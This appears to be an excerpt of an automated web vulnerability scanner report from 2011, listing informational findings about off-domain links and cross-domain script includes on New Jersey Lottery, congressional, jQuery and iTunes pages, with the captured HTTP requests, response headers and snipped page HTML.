<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<script src="http://www.google.com/jsapi?key=notsupplied-wizard" type="text/javascript"></script>

<script src="http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js" type="text/javascript"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../style/internal.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js"></script>
...[SNIP]...
<div class="facebook-feed">
<a class="clear-link" href="http://www.facebook.com/NewJerseyLottery"></a>
...[SNIP]...
</div>
<a href="http://twitter.com/#!/TheNJLottery"><img class="twitter" src="../images/sitewide/icon-twitter.png" width="61" height="76" alt="Twitter" />
...[SNIP]...
<br />
<a href="http://www.youtube.com/newjerseylottery"><img class="youtube" src="../images/sitewide/icon-youtube.png" width="61" height="79" alt="YouTube" />
...[SNIP]...

12.25. http://www.state.nj.us/lottery/vip/3-0_vip_gen_info.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/lottery/vip/3-0_vip_gen_info.htm

Issue detail

The page was loaded from a URL containing a query string:

http://www.state.nj.us/lottery/vip/3-0_vip_gen_info.htm?1

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js
http://twitter.com/
http://www.facebook.com/NewJerseyLottery
http://www.google.com/jsapi?key=notsupplied-wizard
http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js
http://www.youtube.com/newjerseylottery

Request

GET /lottery/vip/3-0_vip_gen_info.htm?1 HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:22 GMT
Content-length: 14721
Content-type: text/html
Last-modified: Mon, 11 Jul 2011 12:47:20 GMT
Etag: "3981-4e1af0d8"
Accept-ranges: bytes
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<script src="http://www.google.com/jsapi?key=notsupplied-wizard" type="text/javascript"></script>

<script src="http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js" type="text/javascript"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../style/internal.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js"></script>
...[SNIP]...
<div class="facebook-feed">
<a class="clear-link" href="http://www.facebook.com/NewJerseyLottery"></a>
...[SNIP]...
</div>
<a href="http://twitter.com/#!/TheNJLottery"><img class="twitter" src="../images/sitewide/icon-twitter.png" width="61" height="76" alt="Twitter" />
...[SNIP]...
<br />
<a href="http://www.youtube.com/newjerseylottery"><img class="youtube" src="../images/sitewide/icon-youtube.png" width="61" height="79" alt="YouTube" />
...[SNIP]...

12.26. http://www.state.nj.us/lottery/where/4-0_where.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/lottery/where/4-0_where.htm

Issue detail

The page was loaded from a URL containing a query string:

http://www.state.nj.us/lottery/where/4-0_where.htm?1

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js
http://twitter.com/
http://www.facebook.com/NewJerseyLottery
http://www.google.com/jsapi?key=notsupplied-wizard
http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js
http://www.youtube.com/newjerseylottery

Request

GET /lottery/where/4-0_where.htm?1 HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:23 GMT
Content-length: 25779
Content-type: text/html
Last-modified: Mon, 11 Jul 2011 15:05:53 GMT
Etag: "64b3-4e1b1151"
Accept-ranges: bytes
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<script src="http://www.google.com/jsapi?key=notsupplied-wizard" type="text/javascript"></script>

<script src="http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js" type="text/javascript"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../style/internal.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js"></script>
...[SNIP]...
<div class="facebook-feed">
<a class="clear-link" href="http://www.facebook.com/NewJerseyLottery"></a>
...[SNIP]...
</div>
<a href="http://twitter.com/#!/TheNJLottery"><img class="twitter" src="../images/sitewide/icon-twitter.png" width="61" height="76" alt="Twitter" />
...[SNIP]...
<br />
<a href="http://www.youtube.com/newjerseylottery"><img class="youtube" src="../images/sitewide/icon-youtube.png" width="61" height="79" alt="YouTube" />
...[SNIP]...

13. Cross-domain script include previous next
There are 86 instances of this issue:

http://climate.rutgers.edu/njwxnet/station.php
http://code.google.com/p/swfobject/
http://code.google.com/p/swfobject/wiki/documentation
http://docs.jquery.com/Tutorials:Introducing_$(document
http://docs.jquery.com/UI
http://docs.jquery.com/UI/Effects/
https://egov.dnrec.delaware.gov/egovpublic/dnrec/disp
http://grimm.house.gov/
http://israel.house.gov/
http://itunes.apple.com/app/delaware-fresh/id446665507
http://itunes.apple.com/us/app/delaware-gov/id444422872
http://javascript.nwbox.com/IEContentLoaded/
http://jquery.com/
http://jquery.malsup.com/cycle/
http://jqueryui.com/about
http://maloney.house.gov/
http://malsup.com/jquery/cycle/
https://market.android.com/details
https://market.android.com/developer
https://market.android.com/static/client/js/1968918977-site_js_compiled_site_js.js
http://medienfreunde.com/lab/innerfade/
http://nj.gov/education/
http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/skenzo/expired/1710072706@Position2,Position3,x01,x02,x03,x04,x05,Bottom,Bottom1,Bottom2
http://peteking.house.gov/
http://qandanj.org/
http://rangel.house.gov/
http://tonko.house.gov/
http://twitter.com/login
http://visitnj.org/
http://webreflection.blogspot.com/2009/01/32-bytes-to-know-if-your-browser-is-ie.html
http://www.cio.ny.gov/universal_broadband
http://www.cs.state.ny.us/
http://www.delaware.gov/apps/
http://www.delaware.gov/topics/yourgovernment
http://www.destateparks.com/fees/entry/annual-pass.asp
http://www.dos.state.ny.us/
http://www.facebook.com/NewJerseyLottery
http://www.facebook.com/plugins/likebox.php
http://www.iloveny.com/
http://www.labor.state.ny.us/ui/ui_index.shtm
http://www.louise.house.gov/
http://www.nj.gov/njbusiness/
http://www.nj.gov/njbusiness/licenses/
http://www.nj.gov/njbusiness/registration/
http://www.nj.gov/njbusiness/starting/
http://www.nj.gov/njbusiness/tax/
http://www.nj.gov/njbusiness/workforce/
http://www.nysenate.gov/
http://www.opensource.org/licenses/gpl-3.0.html
http://www.opensource.org/licenses/mit-license.php
http://www.osc.state.ny.us/
http://www.osc.state.ny.us/ouf/index.htm
http://www.search.state.ny.us/search
http://www.state.nj.us/lottery/about/6-0_about.htm
http://www.state.nj.us/lottery/didiwin/8-0_did_i_win.htm
http://www.state.nj.us/lottery/games/1-0_numbers_draw_games.htm
http://www.state.nj.us/lottery/games/1-1_powerball.shtml
http://www.state.nj.us/lottery/games/1-2_mega_millions.shtml
http://www.state.nj.us/lottery/games/1-3_pick6.shtml
http://www.state.nj.us/lottery/games/1-4_jersey_cash5.shtml
http://www.state.nj.us/lottery/games/1-5_pick4.shtml
http://www.state.nj.us/lottery/games/1-6_pick3.shtml
http://www.state.nj.us/lottery/games/1-7_instant_match.htm
http://www.state.nj.us/lottery/home.shtml
http://www.state.nj.us/lottery/instant/2-0_instant_games.shtml
http://www.state.nj.us/lottery/multimedia/9-0_multimedia.htm
http://www.state.nj.us/lottery/news/5-0_news.htm
http://www.state.nj.us/lottery/news/p071111.htm
http://www.state.nj.us/lottery/news/p071111a.htm
http://www.state.nj.us/lottery/retailer/7-0_retailer.htm
http://www.state.nj.us/lottery/vip/3-0_vip_gen_info.htm
http://www.state.nj.us/lottery/where/4-0_where.htm
http://www.state.nj.us/treasury/doinvest/history3.html
http://www.state.nj.us/treasury/revenue/credcrd.htm
http://www.state.nj.us/treasury/revenue/dcr/geninfo/fees_pd.html
http://www.state.nj.us/treasury/revenue/dcr/geninfo/genserv.html
http://www.state.nj.us/treasury/revenue/dcr/geninfo/instform.html
http://www.state.nj.us/treasury/revenue/elffaq.htm
http://www.unclaimedproperty.nj.gov/
http://www.visitnj.org/events
http://www.visitnj.org/new-jerseys-wineries
http://www.youtube.com/NewJerseyGovernment
http://www.youtube.com/newjerseylottery
https://www6.state.nj.us/LOT_LVC/jsp/lvc1_0_vip_reg.jsp
https://www6.state.nj.us/LOT_LVC/jsp/lvc1_S0_login.jsp
https://www6.state.nj.us/LOT_LVC/jsp/lvc2_0_vip_forgot.jsp

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

13.1. http://climate.rutgers.edu/njwxnet/station.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://climate.rutgers.edu
Path:	/njwxnet/station.php

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /njwxnet/station.php HTTP/1.1
Host: climate.rutgers.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.2. http://code.google.com/p/swfobject/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://code.google.com
Path:	/p/swfobject/

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.gstatic.com/codesite/ph/18339216115563546213/js/ph_core.js
http://www.gstatic.com/codesite/ph/18339216115563546213/js/prettify/prettify_core_compiled.js

Request

GET /p/swfobject/ HTTP/1.1
Host: code.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:51:42 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: codesite
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html>
<html>
<head>
<link rel="icon" type="image/vnd.microsoft.icon" href="http://www.gstatic.com/codesite/ph/images/phosting.ico">

<script type="text/javascript">

var codes
...[SNIP]...
</script>
<script src="http://www.gstatic.com/codesite/ph/18339216115563546213/js/prettify/prettify_core_compiled.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.gstatic.com/codesite/ph/18339216115563546213/js/ph_core.js"></script>
...[SNIP]...

13.3. http://code.google.com/p/swfobject/wiki/documentation previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://code.google.com
Path:	/p/swfobject/wiki/documentation

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.gstatic.com/codesite/ph/18339216115563546213/js/dit_scripts.js
http://www.gstatic.com/codesite/ph/18339216115563546213/js/ph_core.js
http://www.gstatic.com/codesite/ph/18339216115563546213/js/prettify/prettify.js

Request

GET /p/swfobject/wiki/documentation HTTP/1.1
Host: code.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:51:43 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: codesite
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html>
<html>
<head>
<link rel="icon" type="image/vnd.microsoft.icon" href="http://www.gstatic.com/codesite/ph/images/phosting.ico">

<link rel="canonical" href="http
...[SNIP]...
</form>

<script src="http://www.gstatic.com/codesite/ph/18339216115563546213/js/prettify/prettify.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.gstatic.com/codesite/ph/18339216115563546213/js/dit_scripts.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.gstatic.com/codesite/ph/18339216115563546213/js/ph_core.js"></script>
...[SNIP]...

13.4. http://docs.jquery.com/Tutorials:Introducing_$(document previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.jquery.com
Path:	/Tutorials:Introducing_$(document

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /Tutorials:Introducing_$(document HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.9.5
Date: Wed, 13 Jul 2011 01:51:44 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.2.6-1+lenny9
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-Length: 14566

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

13.5. http://docs.jquery.com/UI previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.jquery.com
Path:	/UI

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.9.5
Date: Wed, 13 Jul 2011 01:51:45 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.2.6-1+lenny9
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Mon, 14 Mar 2011 17:20:42 GMT
Content-language: en
Content-Length: 19643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

13.6. http://docs.jquery.com/UI/Effects/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.jquery.com
Path:	/UI/Effects/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI/Effects/ HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.9.5
Date: Wed, 13 Jul 2011 01:51:45 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.2.6-1+lenny9
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Mon, 14 Mar 2011 17:20:42 GMT
Content-Length: 18322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

13.7. https://egov.dnrec.delaware.gov/egovpublic/dnrec/disp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://egov.dnrec.delaware.gov
Path:	/egovpublic/dnrec/disp

Issue detail

The response dynamically includes the following script from another domain:

https://seal.verisign.com/getseal?host_name=egov.dnrec.delaware.gov&size=M&use_flash=NO&use_transparent=NO&lang=en

Request

Response

13.8. http://grimm.house.gov/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://grimm.house.gov
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://widgets.twimg.com/j/2/widget.js

Request

GET / HTTP/1.1
Host: grimm.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-Drupal-Cache: HIT
ETag: "1310513333-0"
X-Generator: Drupal 7 (http://drupal.org)
Last-Modified: Tue, 12 Jul 2011 23:28:53 +0000
Vary: Cookie
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=0
Expires: Wed, 13 Jul 2011 01:52:08 GMT
Date: Wed, 13 Jul 2011 01:52:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 55594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN"
"http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" version="XHTML+RDFa 1.0" dir="ltr"

...[SNIP]...
<div class="block-content">
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

13.9. http://israel.house.gov/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://israel.house.gov
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET / HTTP/1.1
Host: israel.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:52:09 GMT
Server: Apache
Set-Cookie: 9523fa6c9c4a8876a77fee4eb464f789=jf10q0dted36qbpn56rdei5qo3; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 13 Jul 2011 01:52:10 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 53784
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4bd1ea992a11d2ce"></script>
...[SNIP]...

13.10. http://itunes.apple.com/app/delaware-fresh/id446665507 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://itunes.apple.com
Path:	/app/delaware-fresh/id446665507

Issue detail

The response dynamically includes the following scripts from other domains:

http://r.mzstatic.com/htmlResources/C3A6/web-storefront-base.jsz
http://r.mzstatic.com/htmlResources/C3A6/web-storefront-preview.jsz

Request

GET /app/delaware-fresh/id446665507 HTTP/1.1
Host: itunes.apple.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D4%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D3%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D3%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dbuy%26vn%3D1%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3B

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 13 Jul 2011 02:01:31 GMT
x-apple-orig-url-path: /app/delaware-fresh/id446665507
x-apple-application-site: NWK
x-apple-max-age: 3600
x-apple-aka-ttl: Generated Tue Jul 12 19:01:31 PDT 2011, Expires Tue Jul 12 19:02:31 PDT 2011, TTL 60s
x-apple-woa-inbound-url: /WebObjects/MZStore.woa/wa/viewSoftware?id=446665507
x-apple-application-instance: 1002704
Content-Type: text/html; charset=UTF-8
x-webobjects-loadaverage: 0
Content-Length: 29824
Vary: Accept-Encoding
Cache-Control: no-transform, max-age=60
Date: Wed, 13 Jul 2011 02:01:31 GMT
Connection: close
X-Apple-Partner: origin.0

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.apple.com/itms/" lang="en">

<head>

<meta http-equiv="Content-Type" conten
...[SNIP]...
</script>

<script type="text/javascript" charset="utf-8" src="http://r.mzstatic.com/htmlResources/C3A6/web-storefront-base.jsz"></script>
<script type="text/javascript" charset="utf-8" src="http://r.mzstatic.com/htmlResources/C3A6/web-storefront-preview.jsz"></script>
...[SNIP]...

13.11. http://itunes.apple.com/us/app/delaware-gov/id444422872 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://itunes.apple.com
Path:	/us/app/delaware-gov/id444422872

Issue detail

The response dynamically includes the following scripts from other domains:

http://r.mzstatic.com/htmlResources/C3A6/web-storefront-base.jsz
http://r.mzstatic.com/htmlResources/C3A6/web-storefront-preview.jsz

Request

GET /us/app/delaware-gov/id444422872 HTTP/1.1
Host: itunes.apple.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D4%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D3%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D3%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dbuy%26vn%3D1%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3B

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 13 Jul 2011 01:59:37 GMT
x-apple-orig-url-path: /us/app/delaware-gov/id444422872
x-apple-application-site: NWK
x-apple-max-age: 3600
x-apple-aka-ttl: Generated Tue Jul 12 18:59:37 PDT 2011, Expires Tue Jul 12 19:00:37 PDT 2011, TTL 60s
x-apple-woa-inbound-url: /WebObjects/MZStore.woa/wa/viewSoftware?id=444422872&cc=us
x-apple-application-instance: 1003010
Content-Type: text/html; charset=UTF-8
x-webobjects-loadaverage: 0
Content-Length: 27271
Vary: Accept-Encoding
Cache-Control: no-transform, max-age=60
Date: Wed, 13 Jul 2011 01:59:37 GMT
Connection: close
X-Apple-Partner: origin.0

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.apple.com/itms/" lang="en">

<head>

<meta http-equiv="Content-Type" conten
...[SNIP]...
</script>

<script type="text/javascript" charset="utf-8" src="http://r.mzstatic.com/htmlResources/C3A6/web-storefront-base.jsz"></script>
<script type="text/javascript" charset="utf-8" src="http://r.mzstatic.com/htmlResources/C3A6/web-storefront-preview.jsz"></script>
...[SNIP]...

13.12. http://javascript.nwbox.com/IEContentLoaded/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://javascript.nwbox.com
Path:	/IEContentLoaded/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /IEContentLoaded/ HTTP/1.1
Host: javascript.nwbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 10:42:14 GMT
Server: Apache/2.0.54 (Fedora)
Last-Modified: Wed, 29 Jun 2011 03:41:36 GMT
ETag: "463a-8fb19c00"
Accept-Ranges: bytes
Content-Length: 17978
Cache-Control: max-age=259200
Expires: Sat, 16 Jul 2011 10:42:14 GMT
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>IECo
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

13.13. http://jquery.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jquery.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js

Request

GET / HTTP/1.1
Host: jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:52:09 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 06 Jul 2011 18:13:44 GMT
ETag: "49602dc-34a9-8f932600"
Accept-Ranges: bytes
Content-Length: 13481
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
   <html>
   <head>
       <meta http-equiv="content-type" content="text/html; charset=utf-8" />
       <title>jQuery: The Write Less, Do More, JavaScript Library</title>
       <link rel="stylesheet" hr
...[SNIP]...
<link rel="stylesheet" href="http://static.jquery.com/files/rocker/css/screen.css" type="text/css" />
       <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...

13.14. http://jquery.malsup.com/cycle/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jquery.malsup.com
Path:	/cycle/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js
http://github.com/malsup/twitter/raw/master/jquery.twitter.search.js
http://malsup.github.com/chili-1.7.pack.js
http://malsup.github.com/jquery.cycle.all.js
http://malsup.github.com/jquery.easing.1.3.js
http://www.google-analytics.com/urchin.js

Request

GET /cycle/ HTTP/1.1
Host: jquery.malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
